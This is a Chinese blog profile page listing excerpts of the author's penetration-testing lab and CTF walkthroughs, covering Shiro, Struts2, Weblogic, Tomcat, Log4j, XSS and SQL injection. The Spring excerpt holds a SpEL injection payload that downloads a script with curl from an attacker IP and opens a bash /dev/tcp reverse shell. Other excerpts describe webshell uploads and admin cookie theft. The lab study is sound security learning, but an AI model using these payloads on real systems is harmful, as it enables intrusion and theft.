自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(34)
  • 收藏
  • 关注

原创 Shrio

访问网址,使⽤BurpSuite进⾏抓包,在请求包中的cookie字段中添加rememberMe=123;

2024-08-07 20:00:03 215

原创 Spring

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -o /tmp/bash.sh http://目标IP:9999/bash.sh")]=&password=&repeatedPassword=bash -i >& /dev/tcp/目标IP/2222 0>&1。访问/users填写信息,抓包,发送到重放器。// 注意修改IP和端口。进入容器查看成功写入。// 执行.sh文件。

2024-08-07 19:43:15 355

原创 struts2,S2-057远程执行代码漏洞

在url处输入 /${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。抓包,将246验证位置换成我们的payload。访问网站的/struts2-showcase。

2024-08-07 15:05:57 246

原创 Thinkphp5x远程命令执行及getshell

拼接网址,执行远程命令。

2024-08-07 14:34:56 305

原创 apache 漏洞

某些Apache HTTPd 2.4.50也存在此漏洞。

2024-08-06 19:37:09 488

原创 Jboss 漏洞

访问/admin-console/login.seam?conversationId=4 输入admin vulhub登录。找到网址,访问/jbossmq-httpil/HTTPServerILServlet。启动环境,访问/invoker/readonly出现如下界面,说明存在漏洞。访问/invoker/JMXInvokerServlet。点击输入admin admin 登录。点击jboss.deployment。使用工具jexboss.py。出现如下界面,说明存在漏洞。开启下载,说明存在漏洞。

2024-08-06 18:01:26 171

原创 Weblogic 漏洞

将jsp木马打包,改为war,上传,一直下一步,最后点完成,访问99/99.jsp。访问默认用户名:weblogic 密码: Oracle@123。复制网址,使用哥斯拉连接。使用工具检测,存在漏洞。上传webshell。

2024-08-06 11:43:54 315

原创 Tomcat 漏洞

使用哥斯拉生成一个jsp木马,打包,改后缀为war,上传。点击后输入默认用户名、密码:tomcat/tomcat。在kali中使用(AJP协议8009端口开启)登录成功,在文件上传位置上传war包。抓包,将get改为put。访问99/99.jsp。访问木马使用蚁剑连接。读取到这个文件的内容。

2024-08-06 10:35:55 898

原创 未授权访问

找到网址 访问/manage/script/index.php,如果直接登入说明存在漏洞。redis-cli -h 192.168.4.176-p6379 (使用这个连接)使用fofa搜mongdb端口复制ip到Navicat,连接。使用fofa 搜索2181端口使用下面命令在kali在测试。找到网址,直接访问不需要输密码的存在漏洞。连接成功后使用info测试。打开terminal。

2024-08-03 17:16:16 347

原创 Pageadmin 漏洞

用哥斯拉,生成一个asp木马,压缩。

2024-08-03 15:01:03 202

原创 phpMyAdmin 漏洞

判断在www在Extensions同级。修改日志文件状态和日志文件保存路径,在sql语句执行界面执行命令。访问shell,使用工具连接。

2024-08-03 14:03:43 339

原创 ASPCMS 漏洞

将slideTextStatus的值修改为1%25>

2024-08-03 11:51:09 361

原创 DeDe-cms 漏洞

找到index.html修改。我们写一个一句话木马,点击访问后使用工具连接。

2024-08-03 10:43:51 209

原创 cms-wordpress 漏洞

登录后台。

2024-08-03 09:59:35 348

原创 cms-easy 支付漏洞

找到一个使用cms-easy网站。我们进入购买产品界面,点击购买。修改个数为负数,填写联系方式。

2024-08-02 12:58:26 276

原创 大米cms支付漏洞

来到dami,注册一个用户查看当前余额为0。我们这次正常购买产品,付款方式还是站内付款。我们找一个产品购买-1个。修改支付方式为站内扣款。提交订单,发现提交成功。

2024-08-02 12:31:53 157

原创 php反序列化靶机serial实战

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。查看文件,多返回几次上级目录,找到一个txt文件。

2024-08-01 19:38:46 301

原创 JANGOW: 1.0.1 靶机

我们输入输入一个whoami查看是否可以执行,存在命令执行漏洞。发现可以执行系统命令,我们给echo一个一句话木马使用工具连接。发现三个可以点击的,点击到第三个跳转到一个有参数的页面。修改后可以直接ifconfig得到ip。访问1.php查看是否创建成功。访问到了,复制网址使用蚁剑连接。访问ip得到如下界面。

2024-07-31 21:13:43 363

原创 申瓯通信系统命令执行漏洞

抓包,将下列代码进行替换。

2024-07-31 18:00:44 184

原创 CVE-2021-44228 漏洞复现

以上可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听..发现/solr/admin/cores?action=,可以上传参数,使用dnslog,让其返回Java版本号。下载JDNI,放到攻击机,输入如下命令。拿取JDK1.8的ldap直接访问。开始准备反弹shell。在攻击机开启监听端口。

2024-07-31 17:48:08 344

原创 Bugku Web专项(持续更新)

点击网址访问网址,他让我们输入一个flag参数我们查看页面源代码他告诉我们有经常设置secret_key 变量可以知道要传入一个名为flag的参数,又说我们经常设置一个secret_key我们传入参数 /?得到flag进入网址和第一关一样,让我们输入一个flag参数,查看页面源代码没有什么有用的信息,我们看一下config。

2024-07-30 20:27:30 380

原创 文件解析漏洞复现

访问http://网址/1.jpg/.php访问成功。再次失败,在文件中加一个图片格式头,再次上传。写一个1.jpg文件内容如下上传到目标站点。下载Vulhub并打开容器,访问网址。复制木马网址使用蚁剑连接(连接成功)打开抓包在jpg文件末尾加两个空格。创建一个ooo.asp;提交一个php文件上传失败。访问网址上传一个jpg文件。将文件格式改为jpg上传。

2024-07-30 17:00:12 1237

原创 tomato靶场

访问/etc/passwd/发现确实有文件包含漏洞。产看iofo.php源码,发现里面有文件包含漏洞。我们用kali扫描一下目录。

2024-07-29 18:49:10 420

原创 AI WEB 1.0靶机

发现一个PHP info()页面、一个可能存在sql注入的页面,phpinfo()页面可以看到网址的物理路径,如果另一个页面存在sql注入我们可以使用sqlmap获取os-shell。再试一下/home/www/html/web1x443290o2sdf92213//se3reTdir777/uploads/再试一下/home/www/html/web1x443290o2sdf92213//se3reTdir777/and 1=2显示异常 存在sql注入。我们获取os-shell。and 1=1正常显示。

2024-07-29 15:52:25 302

原创 hackme-1靶机

发现了一个超级admin用户,用md5解码解一下密码。查看当前数据库:(webapphacking)将木马网址复制到哥斯拉中建立连接。存在sql注入漏洞 判断列数。注册一个账户,点击搜索。查看users表中的列。

2024-07-29 13:29:47 500

原创 upload-labs靶场通过全攻略(精简)

我们现在upload-labs靶场中新建一个upload文件夹。

2024-07-26 12:43:43 402

原创 XXE靶机

上面除了xxe还有xxe/admin.php,我们试一下xxe账户密码错误再试一下admin.php发现登录成功。发现他网址有问题,他这个文件应该是在xxe目录下我们在flagmeout.php前面加上/xxe/并访问。我们扫描一下ip/xxe,admin.php可能有东西试一下。的页面,如何找到和利用xxe漏洞,并找到flag呢?发现没有flag,查看页面源代码也没有发现什么。发现是空白的,查看页面源代码得到flag。访问xxe 输入发现name有回显。我们扫描一下ip+xxe。弹出flag我们点一下。

2024-07-25 18:15:17 345

原创 XXE-Lab for PHP靶场

随便树一点查看回显点,为username。仍到重放器运行发现flag。

2024-07-25 15:49:50 275

原创 CTFHub-SSRF 通关全集

点击环境在改url为url=http://127.0.0.1/flag.php。

2024-07-24 18:37:44 286

原创 xss-labs 通关全攻略

alert(1)</script>后没有反应 查看网页源代码。将 test改为<script>alert(1)</script>弹出成功过关。"> <script>alert(1)</script> <"闭合掉双引号。输入<script>alert(1)

2024-07-23 21:23:19 347

原创 xss平台获取管理员cookie

登录管理员后台(用户:admin 密码: 123456)复制第二条 粘到pikachu靶场xss盲打关卡。点击创建的项目,查看配置代码。我们可以看到有主机上线。可以看见cookie。

2024-07-23 19:34:22 209 1

原创 XSS-flash钓鱼

三、在xss平台上的公共模块点击flash窗口钓鱼的源码并保存到一个js文件放在根目录下。四、将1.js中的代码修改为伪造网站的网址。五、在kali中执行如下代码生成木🐎。新建一个1.hmtl 输入如下代码。一、在本机下载PHPstudy。(选择多的哪个)如下图。

2024-07-23 18:18:19 747

原创 SQL-labs靶场

输入 1' 发现报错 注释后正常显示说明是'闭合。本关为post,在输入尝试注入。在密码框尝试注入 发现也有报错。我们在username注入。

2024-07-22 13:02:07 300

原创 墨者靶场 四关

3墨:https://www.mozhe.cn/bug/detail/NjM3MSt5VWovcWtHOU9kaUF5dUFXQT09bW96aGUmozhe。

2024-07-22 11:47:34 284

墨者靶场 post ,DB2,绕过登录,sql注入四关

通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关

2024-07-22

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除